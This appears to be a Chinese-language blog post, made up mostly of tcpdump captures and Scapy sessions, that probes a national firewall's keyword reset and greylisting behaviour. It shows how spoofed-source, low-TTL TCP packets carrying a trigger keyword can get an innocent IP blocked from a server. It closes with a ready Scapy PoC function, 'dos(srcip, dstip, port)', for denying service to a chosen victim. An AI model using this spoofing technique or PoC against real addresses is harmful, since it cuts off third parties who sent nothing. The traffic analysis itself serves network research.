\u4f46\u662f\u8fd9\u4e00\u6b21\u7684\u8bf7\u6c42\u88ab\u4f60\u4fa5\u5e78\u83b7\u53d6\u5e76\u4e0d\u80fd\u610f\u5473\u7740\u4ec0\u4e48\uff0c\u9632\u706b\u5899\u7684\u53e6\u5916\u4e00\u4e2a\u5f3a\u5927\u529f\u80fd\u4f60\u8fd8\u6ca1\u6709\u4f53\u9a8c\uff0c\u90a3\u5c31\u662f\u7070\u540d\u5355\u52a8\u6001\u5c01\u7981\u529f\u80fd\uff0c\u901a\u8fc7\u4e0a\u9762\u7684\u8bf7\u6c42\uff0c\u4f60\u5df2\u7ecf\u88ab\u8ba4\u4e3a\u662f\u9ed1\u5ba2\u89e6\u53d1\u4e86\u9632\u706b\u5899\u7684\u89c4\u5219\uff0c\u4f60\u7684ip\u548c\u76ee\u6807\u670d\u52a1\u5668\u4e4b\u95f4\u7684\u8bf7\u6c42\u5c06\u4e34\u65f6\u6027\u7684\u51fa\u73b0\u95ee\u9898\u3002\u6b63\u5e38\u60c5\u51b5\u4e0b\u5230Google\u7684TCP\u8fde\u63a5\u5982\u4e0b\uff0c\u8fd9\u91cc\u6f14\u793a\u7684\u662fnc\u94fe\u63a5\u5230\u670d\u52a1\u5668\u5e76\u4e14\u65ad\u6389\u7684\u7ed3\u679c\uff1a <\/p>\n
hkg01s01-in-f103.1e100.net [64.233.189.103] 80 (http) open
sent 0, rcvd 0
bt ~ # <\/p>\n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
21:53:12.553207 IP (tos 0x0, ttl 64, id 20037, offset 0, flags [DF], proto TCP (6), length 60) 192.168.1.2.46064 > 64.233.189.103.80: S, cksum 0xc664 (correct), 2283082267:2283082267(0) win 5840 <mss 1460,sackOK,timestamp 285790 0,nop,wscale 4>
21:53:12.637507 IP (tos 0x0, ttl 50, id 23363, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.2.46064: S, cksum 0xbbe7 (correct), 889377555:889377555(0) ack 2283082268 win 5672 <mss 1412,sackOK,timestamp 918539372 285790,nop,wscale 6>
21:53:12.637539 IP (tos 0x0, ttl 64, id 20038, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.2.46064 > 64.233.189.103.80: ., cksum 0xff28 (correct), 2283082268:2283082268(0) ack 889377556 win 365 <nop,nop,timestamp 285811 918539372>
21:53:18.110166 IP (tos 0x0, ttl 64, id 20039, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.2.46064 > 64.233.189.103.80: F, cksum 0xf9d1 (correct), 2283082268:2283082268(0) ack 889377556 win 365 <nop,nop,timestamp 287177 918539372>
21:53:18.206770 IP (tos 0x0, ttl 50, id 23364, offset 0, flags [none], proto TCP (6), length 52) 64.233.189.103.80 > 192.168.1.2.46064: F, cksum 0xe535 (correct), 889377556:889377556(0) ack 2283082269 win 89 <nop,nop,timestamp 918544923 287177>
21:53:18.206805 IP (tos 0x0, ttl 64, id 20040, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.2.46064 > 64.233.189.103.80: ., cksum 0xe408 (correct), 2283082269:2283082269(0) ack 889377557 win 365 <nop,nop,timestamp 287202 918544923> <\/p>\n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
00:18:31.651147 IP (tos 0x0, ttl 64, id 22184, offset 0, flags [DF], proto TCP (6), length 60) 192.168.1.4.49124 > 64.233.189.103.80: S, cksum 0x6925 (correct), 3774335672:3774335672(0) win 5840 <mss 1460,sackOK,timestamp 1809424 0,nop,wscale 4>
00:18:31.739447 IP (tos 0x0, ttl 50, id 44562, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.4.49124: S, cksum 0x97db (correct), 3821251813:3821251813(0) ack 3774335673 win 5672 <mss 1412,sackOK,timestamp 1098842086 1809424,nop,wscale 6>
00:18:31.739469 IP (tos 0x0, ttl 64, id 22185, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.4.49124 > 64.233.189.103.80: ., cksum 0xdb1b (correct), 3774335673:3774335673(0) ack 3821251814 win 365 <nop,nop,timestamp 1809446 1098842086>
00:18:31.820608 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.4.49124: R, cksum 0x6ea9 (correct), 3821251814:3821251814(0) win 12379 <\/p>\n
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
21:47:54.614462 IP (tos 0x0, ttl 64, id 20834, offset 0, flags [DF], proto TCP (6), length 60) 192.168.1.2.53343 > 64.233.189.103.80: S, cksum 0x8ead (correct), 1951758128:1951758128(0) win 5840 <mss 1460,sackOK,timestamp 206418 0,nop,wscale 4>
21:47:54.691420 IP (tos 0x0, ttl 42, id 26966, offset 0, flags [DF], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: S, cksum 0x273e (correct), 2970573198:2970573198(0) ack 1951758129 win 453
21:47:54.691449 IP (tos 0x0, ttl 64, id 20835, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.2.53343 > 64.233.189.103.80: ., cksum 0x1234 (correct), 1951758129:1951758129(0) ack 2970573199 win 5840
21:47:54.696983 IP (tos 0x0, ttl 50, id 51733, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.2.53343: S, cksum 0xa76e (correct), 794483022:794483022(0) ack 1951758129 win 5672 <mss 1412,sackOK,timestamp 929146873 206418,nop,wscale 6>
21:47:54.696998 IP (tos 0x0, ttl 64, id 20836, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.2.53343 > 64.233.189.103.80: ., cksum 0x1234 (correct), 1951758129:1951758129(0) ack 2970573199 win 5840
21:47:54.700298 IP (tos 0x0, ttl 43, id 26887, offset 0, flags [DF], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0x292f (correct), 794483023:794483023(0) ack 1951758129 win 454
21:47:54.769090 IP (tos 0x0, ttl 46, id 26650, offset 0, flags [DF], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0x2737 (correct), 2970573199:2970573199(0) ack 1951758129 win 457
21:47:54.769853 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0xcb9f (correct), 2970573199:2970573199(0) win 18679
21:47:54.773332 IP (tos 0x0, ttl 50, id 51734, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0x1497 (correct), 2970573199:2970573199(0) win 0
21:47:54.774292 IP (tos 0x0, ttl 48, id 26492, offset 0, flags [DF], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0x2735 (correct), 2970573199:2970573199(0) ack 1951758129 win 459
21:47:54.775939 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0xbf63 (correct), 2970573199:2970573199(0) win 21811
21:47:54.778871 IP (tos 0x0, ttl 50, id 51735, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.2.53343: R, cksum 0x1497 (correct), 2970573199:2970573199(0) win 0 <\/p>\n
>>> ls(IP)
version : BitField = (4)
ihl : BitField = (None)
tos : XByteField = (0)
len : ShortField = (None)
id : ShortField = (1)
flags : FlagsField = (0)
frag : BitField = (0)
ttl : ByteField = (64)
proto : ByteEnumField = (0)
chksum : XShortField = (None)
src : Emph = (None)
dst : Emph = ('127.0.0.1')
options : IPoptionsField = ('')
>>> ls(TCP)
sport : ShortEnumField = (20)
dport : ShortEnumField = (80)
seq : IntField = (0)
ack : IntField = (0)
dataofs : BitField = (None)
reserved : BitField = (0)
flags : FlagsField = (2)
window : ShortField = (8192)
chksum : XShortField = (None)
urgptr : ShortField = (0)
options : TCPOptionsField = ({})
>>> <\/p>\n
\u8fd9\u91cc\u6d4b\u8bd5\u7684\u57fa\u672c\u60f3\u6cd5\u662f\uff0c\u6211\u4eec\u5bf9\u4e00\u4e2a\u60f3\u8981\u653b\u51fb\u7684ip\u5982121.121.121.121\uff0c\u60f3\u4f7f\u4ed6\u4e0d\u80fd\u8bbf\u95eegoogle\u7684\u670d\u52a1\u566864.233.189.103\uff0c\u5c31\u53ef\u4ee5\u60f3\u529e\u6cd5\u4f2a\u9020\u4e00\u4e2a\u5b83\u7684ip\u901a\u8fc7\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5e76\u4e14\u89e6\u53d1\u89c4\u5219\u5c31\u53ef\u4ee5\u4e86\u3002\u5f97\u76ca\u4e8e\u56fd\u5185\u8fd0\u8425\u5546\u5bf9\u6570\u636e\u5305\u7684\u6765\u6e90\u6709\u6548\u6027\u4e0d\u4f1a\u505a\u4efb\u4f55\u9650\u5236\uff0c\u53ef\u4ee5\u968f\u4fbf\u4f2a\u9020\u522b\u7684IP\u7684\u6570\u636e\u5305\u53d1\u5230\u6307\u5b9a\u7684\u5730\u65b9\uff0c\u540c\u6837\u5f97\u76ca\u4e8e\u6b64\u7684\u8fd8\u6709\u6b23\u6b23\u5411\u8363\u7684ddos\u884c\u4e1a\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u8981\u60f3\u529e\u6cd5\u89e6\u53d1\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u7684\u89c4\u5219\u5c31\u662f\u4e86\u3002
\u5148\u8fdb\u884c\u6700\u7b80\u5355\u7684\uff1a <\/p>\n
00:41:29.014316 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto: TCP (6), length: 59) 114.249.114.249.57474 > 64.233.189.103.80: P, cksum 0x9fb7 (correct), 945149829:945149848(19) win 8192 <\/p>\n
\u770b\u6765\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u8fd8\u662f\u6709\u4e00\u4e9b\u9632\u8303\u7b56\u7565\uff0c\u6ca1\u6709\u60f3\u8c61\u4e2d\u90a3\u6837\u76f4\u63a5\u68c0\u6d4bpush\u5305\uff0c\u8d77\u7801\u662f\u80fd\u5bf9\u975e\u6cd5\u7684\uff0c\u65e0\u6548\u7684TCP\u94fe\u63a5\u8fdb\u884c\u8bc6\u522b\u3002\u5f88\u4f69\u670d\u9632\u706b\u5899\u7684\u4f1f\u5927\uff0c\u8fd9\u4e48\u5927\u7684\u6d41\u91cf\u8fd8\u80fd\u505a\u5230\u8fd9\u79cd\u7a0b\u5ea6\uff0c\u516c\u53f8\u5185\u90e8\u7684\u9632\u706b\u5899\u90a3\u4e48\u70b9\u6d41\u91cf\u8fd8\u5431\u5440\u5431\u5440\u54cd\u5462\uff0c\u731c\u6d4b\u6ca1\u6709\u7528\uff0c\u56de\u5fc6\u524d\u9762\u63d0\u5230\u7684\uff0c\u80fd\u63a7\u5236\u4e00\u4e2aTCP\u94fe\u63a5\u9700\u8981\u7684\u51e0\u4e2a\u5143\u7d20\uff0c\u6211\u4eec\u9700\u8981\u4e94\u5143\u7ec4\uff0c\u6d4b\u8bd5\u770b\u770b\uff0c\u6211\u4eec\u5148\u5efa\u7acb\u4e00\u6761\u6b63\u5e38\u7684\u5230Google\u7684\u94fe\u63a5\uff0c\u5e76\u4e14\u6293\u53d6\u4e94\u5143\u7ec4\u6765\u6d4b\u8bd5\uff1a <\/p>\n
d00:49:38.694884 IP (tos 0x0, ttl 64, id 55469, offset 0, flags [DF], proto: TCP (6), length: 60) 114.249.114.249.60931 > 64.233.189.103.80: S, cksum 0x188c (correct), 3664548093:3664548093(0) win 5840 <mss 1460,sackOK,timestamp 1951942736 0,nop,wscale 7>
00:49:38.745534 IP (tos 0x0, ttl 51, id 57212, offset 0, flags [none], proto: TCP (6), length: 60) 64.233.189.103.80 > 114.249.114.249.60931: S, cksum 0x40d4 (correct), 2550448670:2550448670(0) ack 3664548094 win 5672 <mss 1430,sackOK,timestamp 1084177835 1951942736,nop,wscale 6>
00:49:38.745546 IP (tos 0x0, ttl 64, id 55470, offset 0, flags [DF], proto: TCP (6), length: 52) 114.249.114.249.60931 > 64.233.189.103.80: ., cksum 0x8548 (correct), 3664548094:3664548094(0) ack 2550448671 win 46 <nop,nop,timestamp 1951942787 1084177835> <\/p>\n
00:52:12.657154 IP (tos 0x0, ttl 51, id 57212, offset 0, flags [none], proto: TCP (6), length: 52) 64.233.189.103.80 > 114.249.114.249.60931: ., cksum 0x2be4 (correct), 2550448671:2550448671(0) ack 3664548094 win 89 <nop,nop,timestamp 1084331746 1951942787>
\u6570\u636e\u5305\u987a\u5229\u7684\u901a\u8fc7\u4e86\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\uff0cGoogle\u8fd8\u7ed9\u6211\u4eec\u53d1\u6765\u4e86\u7ea0\u6b63\u5e8f\u5217\u53f7\u7684ack\u5305\u3002\u8fd9\u4e2a\u65f6\u5019\u6211\u5c31\u5f88\u60ca\u5947\u4e86\uff0c\u5bf9\u4e00\u6761\u94fe\u63a5\u771f\u5b9e\u6027\u7684\u9a8c\u8bc1\u53ef\u4ee5\u4e0d\u53ea\u5230\u8fbe\u4e94\u5143\u7ec4\u7a0b\u5ea6\uff0c\u751a\u81f3\u53ef\u4ee5\u5230\u8fbe\u5e8f\u5217\u53f7\u7684\u7ea7\u522b\uff0c\u800c\u5b83\u6240\u505a\u7684\u5730\u65b9\u662f\u5728\u56fd\u5bb6\u7684\u4e3b\u5e72\u4e0a\uff0c\u8fd9\u51e0\u4e4e\u662f\u4e0d\u53ef\u60f3\u8c61\u7684\u3002\u8fd9\u4e2a\u65f6\u5019\u601d\u8003\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u7684\u5b9e\u73b0\u65b9\u5f0f\uff0c\u53ef\u80fd\u662f\u7ef4\u62a4\u4e00\u4e2a\u94fe\u63a5\u7684\u72b6\u6001\u8868\uff0c\u5e76\u4e14\u5bf9\u8fd9\u4e2a\u8868\u7684\u6240\u6709\u72b6\u6001\u8fdb\u884c\u5b9e\u65f6\u8ddf\u8e2a\uff0c\u4f46\u8fd9\u6837\u4ed6\u5c31\u592a\u540a\u4e86\uff0c\u8fd9\u4e2a\u65f6\u5019\u5f00\u59cb\u60f3\u5230\u7528\u4e00\u4e9b\u7578\u5f62\u5305\u6765\u6d4b\u8bd5\u9632\u706b\u5899\u7684\u673a\u5236\u3002
\u4ece\u524d\u9762\u77e5\u9053\uff0c\u6211\u4eec\u5230Google\u670d\u52a1\u5668\u7684TTL\u662f14\u8df3\uff0c\u4e5f\u5c31\u662f\u5982\u679c\u6211\u4eec\u53d1\u521d\u59cbTTL\u5c0f\u4e8e14\u7684\u8bdd\uff0c\u6309\u7167TTL\u7684\u57fa\u672c\u539f\u7406\uff0c\u8bf7\u6c42\u662f\u4e0d\u4f1a\u8fbe\u5230Google\u7684\u670d\u52a1\u5668\u7684\uff0c\u5982\u679c\u6211\u4eec\u63a7\u5236TTL=12\u7684\u8bdd\u751a\u81f3\u53ef\u4ee5\u5c06\u5305\u901a\u8fc7\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u4f46\u662f\u4e0d\u5230\u8fbe\u670d\u52a1\u5668\uff0c\u8fd9\u4e2a\u65f6\u5019\u6211\u4eec\u77e5\u9053\uff0c\u5982\u679c\u6211\u4eec\u5728\u4e24\u4fa7\u653e\u7f6e\u81ea\u5df1\u7684\u673a\u5668\uff0c\u5728\u53e6\u5916\u4e00\u4fa7\u53ef\u4ee5\u4f2a\u9020\u6210Google\u7684\u670d\u52a1\u5668\uff0c\u5728\u81ea\u5df1\u8fd9\u4e00\u4fa7\u4f2a\u9020\u6210\u76ee\u6807\u7684IP\uff0c\u63a7\u5236TTL\u8ba9\u4e24\u7aef\u7684\u673a\u5668\u4e92\u76f8\u901a\u8fc5\u89e6\u53d1\u89c4\u5219\uff0c\u76f4\u5230\u88ab\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5217\u5165\u7070\u540d\u5355\uff0c\u4f46\u662f\u771f\u6b63\u7684\u88ab\u4f2a\u9020\u7684IP\u5374\u4e0d\u4f1a\u77e5\u9053\u53d1\u751f\u4e86\u4ec0\u4e48\u3002\u8fd9\u4e2a\u601d\u8def\u80af\u5b9a\u53ef\u4ee5\u6210\u529f\uff0c\u4f46\u662f\u4e4b\u524d\u6211\u4eec\u53ef\u4ee5\u8bd5\u8bd5\u5176\u4ed6\u7684\uff0c\u6bd5\u7adf\u6211\u6ca1\u6709\u56fd\u5916\u7684\u673a\u5668\uff0c\u6709\u4e0d\u6709\u53ef\u80fd\u5728\u4e00\u7aef\u53d1\u6570\u636e\u5305\u5c31\u53ef\u4ee5\u5b9e\u73b0\u5c06\u522b\u7684IP\u5217\u5165\u7070\u540d\u5355\u5462\uff1f\u6211\u5728\u5c1d\u8bd5\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u8ddf\u8e2a\u94fe\u63a5\u65f6\u7684\u8bbe\u8ba1\u65f6\u627e\u5230\u4e86\u7b54\u6848\u3002\u524d\u9762\u6211\u4eec\u77e5\u9053\uff0c\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5bf9\u4e00\u4e2a\u8bf7\u6c42\u7684\u8ddf\u8e2a\u80fd\u591f\u8fbe\u5230\u5e8f\u5217\u53f7\u7ea7\u522b\uff0c\u8fd9\u662f\u4e0d\u53ef\u601d\u8bae\u7684\u4e8b\u60c5\uff0c\u56e0\u4e3a\u8ba1\u7b97\u91cf\u548c\u6570\u636e\u91cf\u592a\u5927\u4e86\uff0c\u90a3\u4e2a\u65f6\u5019\u6211\u5c31\u6000\u7591\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u4f1a\u4e0d\u4f1a\u5bf9\u6570\u636e\u5305\u505a\u9a8c\u8bc1\uff0c\u90a3\u6837\u4f1a\u589e\u52a0\u8ba1\u7b97\u91cf\uff0c\u5bf9\u4e8e\u9aa8\u5e72\u7ea7\u7684\u8bbe\u5907\u6765\u8bf4\u4e0d\u53ef\u63a5\u53d7\u7684\uff0c\u4e07\u4e00\u5224\u65ad\u5b8c\u4e4b\u540e\u771f\u6b63\u7684\u670d\u52a1\u5668\u5df2\u7ecf\u8fd4\u56de\u4e86\u5c31\u9ebb\u70e6\u4e86\u3002\u540c\u65f6\uff0c\u7531\u4e8e\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u67b6\u6784\u7684\u8bbe\u8ba1\uff0c\u6211\u4eec\u80fd\u63a7\u5236\u6570\u636e\u5305\u7684\u51fa\u53e3\uff0c\u4f46\u662f\u5b9e\u9645\u4e0a\u6570\u636e\u5305\u7684\u8fd4\u56de\u7684\u65f6\u5019\u8d70\u7684\u662f\u53ef\u80fd\u5b8c\u5168\u4e0d\u540c\u7684\u4e00\u6761\u8def\u7531\uff0c\u6240\u4ee5\u4e0d\u53ef\u80fd\u5bf9\u8bf7\u6c42\u7684\u8ddf\u8e2a\u505a\u5230\u53cc\u5411\u8ddf\u8e2a\uff0c\u8fd9\u91cc\u7684\u8ddf\u8e2a\u5b8c\u5168\u53ef\u80fd\u662f\u4e00\u79cd\u865a\u62df\u884c\u4e3a\u7684\uff0c\u5bf9\u53d1\u8d77\u8bf7\u6c42\u4e00\u7aef\u7684\u6821\u9a8c\u3002\u8fd9\u91cc\u7684\u6d4b\u8bd5\u4e5f\u5f88\u7b80\u5355\uff0c\u4e5f\u8bc1\u660e\u4e86\u6211\u7684\u7ed3\u8bba\uff1a <\/p>\n
>>> send(IP(dst="64.233.189.103",ttl=10)\/TCP(dport=80,sport=2222,flags="A",seq=1234568))
>>> send(IP(dst="64.233.189.103",ttl=10)\/TCP(dport=80,sport=2222,flags="P",seq=1234568)\/"GET \/search?hl=en&source=hp&q=freenet\/freenet&oq=&aqi=1 HTTP\/1.1
\\r\\nHOST: www.google.com\\r\\n\\r\\n\\r\\n") <\/p>\n
>>> send(IP(dst="64.233.189.103",src="121.121.121.121",ttl=10)\/TCP(dport=80,sport=2222,flags="A",seq=1234568))
>>> send(IP(dst="64.233.189.103",src="121.121.121.121",ttl=10)\/TCP(dport=80,sport=2222,flags="P",seq=1234568)\/"GET \/q=freenet\/freenet&oq=&aqi=1 HTTP\/1.1") <\/p>\n
\u4f46\u662f\u4e5f\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u5df2\u7ecf\u5b9e\u73b0\u5c06\u540e\u7eed\u7684\u94fe\u63a5\u65ad\u5f00\uff0c\u56e0\u4e3atcp\u94fe\u63a5\u5e8f\u5217\u53f7\u7684\u672a\u77e5\u6027\uff0c\u5229\u7528\u4e0a\u9762\u63d0\u5230\u7684\u8c8c\u4f3c\u8fd8\u4e0d\u80fd\u8ba9\u5df2\u7ecf\u5efa\u7acb\u5b8c\u6210\u7684tcp\u94fe\u63a5reset\uff0c\u4f46\u5b9e\u9645\u4e0a\u8fd9\u6b3e\u6709\u7231\u7684\u8fc7\u6ee4\u7cfb\u7edf\u5df2\u7ecf\u5e2e\u6211\u4eec\u60f3\u5230\u4e86\uff0c\u540c\u65f6\u7528nc\u8ddfGoogle\u5efa\u7acb\u4e24\u4e2a\u94fe\u63a5\uff0c\u5728\u5176\u4e2d\u4e00\u4e2a\u94fe\u63a5\u91cc\u89e6\u53d1\u89c4\u5219\uff0c\u7136\u540e\u5728\u53e6\u4e00\u4e2a\u65e0\u8f9c\u7684\u94fe\u63a5\u53ea\u8981\u88ab\u9632\u706b\u5899\u53d1\u73b0\uff0c\u5c31\u4f1a\u7acb\u523b\u88abreset\u4e86\uff0c\u770b\u5982\u4e0b\u7684\u6293\u5305\uff1a <\/p>\n
20:26:52.574643 IP (tos 0x0, ttl 64, id 55786, offset 0, flags [DF], proto: TCP (6), length: 60) 114.249.114.249.60949 > 64.233.189.147.80: S, cksum 0x339b (correct), 1962684567:1962684567(0) win 5840 <mss 1460,sackOK,timestamp 2109008253 0,nop,wscale 7>
20:26:52.617778 IP (tos 0x0, ttl 51, id 15574, offset 0, flags [none], proto: TCP (6), length: 60) 64.233.189.147.80 > 114.249.114.249.60949: S, cksum 0x8801 (correct), 4247640462:4247640462(0) ack 1962684568 win 5672 <mss 1430,sackOK,timestamp 1246071629 2109008253,nop,wscale 6>
20:26:52.617791 IP (tos 0x0, ttl 64, id 55787, offset 0, flags [DF], proto: TCP (6), length: 52) 114.249.114.249.60949 > 64.233.189.147.80: ., cksum 0xcc7d (correct), 1962684568:1962684568(0) ack 4247640463 win 46 <nop,nop,timestamp 2109008296 1246071629> <\/p>\n
20:27:00.499066 IP (tos 0x0, ttl 51, id 4036, offset 0, flags [none], proto: TCP (6), length: 60) 64.233.189.147.80 > 114.249.114.249.60979: S, cksum 0xc1d9 (correct), 816454471:816454471(0) ack 1983571279 win 5672 <mss 1430,sackOK,timestamp 1259538068 2109016136,nop,wscale 6>
20:27:00.499074 IP (tos 0x0, ttl 64, id 60679, offset 0, flags [DF], proto: TCP (6), length: 52) 114.249.114.249.60979 > 64.233.189.147.80: ., cksum 0x0656 (correct), 1983571279:1983571279(0) ack 816454472 win 46 <nop,nop,timestamp 2109016179 1259538068> <\/p>\n
20:27:18.870912 IP (tos 0x0, ttl 51, id 4036, offset 0, flags [none], proto: TCP (6), length: 52) 64.233.189.147.80 > 114.249.114.249.60979: ., cksum 0x76b1 (correct), 816454472:816454472(0) ack 1983571304 win 89 <nop,nop,timestamp 1259556440 2109034511>
20:27:19.289520 IP (tos 0x0, ttl 64, id 60681, offset 0, flags [DF], proto: TCP (6), length: 53) 114.249.114.249.60979 > 64.233.189.147.80: P, cksum 0x0291 (incorrect (-> 0x6b05), 1983571304:1983571305(1) ack 816454472 win 46 <nop,nop,timestamp 2109034973 1259556440>
20:27:19.334402 IP (tos 0x0, ttl 51, id 4037, offset 0, flags [none], proto: TCP (6), length: 52) 64.233.189.147.80 > 114.249.114.249.60979: ., cksum 0x7315 (correct), 816454472:816454472(0) ack 1983571305 win 89 <nop,nop,timestamp 1259556901 2109034973>
20:27:19.338648 IP (tos 0x0, ttl 52, id 64, offset 0, flags [none], proto: TCP (6), length: 40) 64.233.189.147.80 > 114.249.114.249.60979: R, cksum 0x0142 (correct), 816454472:816454472(0) win 29119 <\/p>\n
20:27:37.900887 IP (tos 0x0, ttl 51, id 15574, offset 0, flags [none], proto: TCP (6), length: 52) 64.233.189.147.80 > 114.249.114.249.60949: ., cksum 0x6aa0 (correct), 4247640463:4247640463(0) ack 1962684583 win 89 <nop,nop,timestamp 1246116911 2109053544>
20:27:37.911380 IP (tos 0x0, ttl 52, id 64, offset 0, flags [none], proto: TCP (6), length: 40) 64.233.189.147.80 > 114.249.114.249.60949: R, cksum 0xd646 (correct), 4247640463:4247640463(0) win 4621 <\/p>\n
\u90a3\u6211\u4eec\u5c31\u6709\u4e86\u6ee1\u7bc7\u5e9f\u8bdd\u4e4b\u540e\u7684\u4e00\u4e2a\u7b80\u5355\u7684\u7ed3\u8bba\uff0cdos\u56fd\u5185\u548c\u56fd\u5916\u7684\u94fe\u63a5\u662f\u53ef\u80fd\u7684\uff0c\u65e0\u8bba\u662f\u5efa\u7acb\u597d\u7684\u8fd8\u662f\u672a\u5efa\u7acb\u7684\uff0c\u5728scapy\u91cc\u7684poc\u51fd\u6570\u5982\u4e0b\uff1a <\/p>\n
send(IP(dst=dstip,src=srcip,ttl=10)\/TCP(dport=tport,sport=3223,flags="S",seq=3334567))
send(IP(dst=dstip,src=srcip,ttl=10)\/TCP(dport=tport,sport=3223,flags="A",seq=3334568))
send(IP(dst=dstip,src=srcip,ttl=10)\/TCP(dport=tport,sport=3223,flags="P",seq=3334568)\/"GET \/?q=freenet\/freenet HTTP\/1.1\\r\\n\\r\\n")
dos("114.249.114.249","64.233.189.103",80); <\/p>\n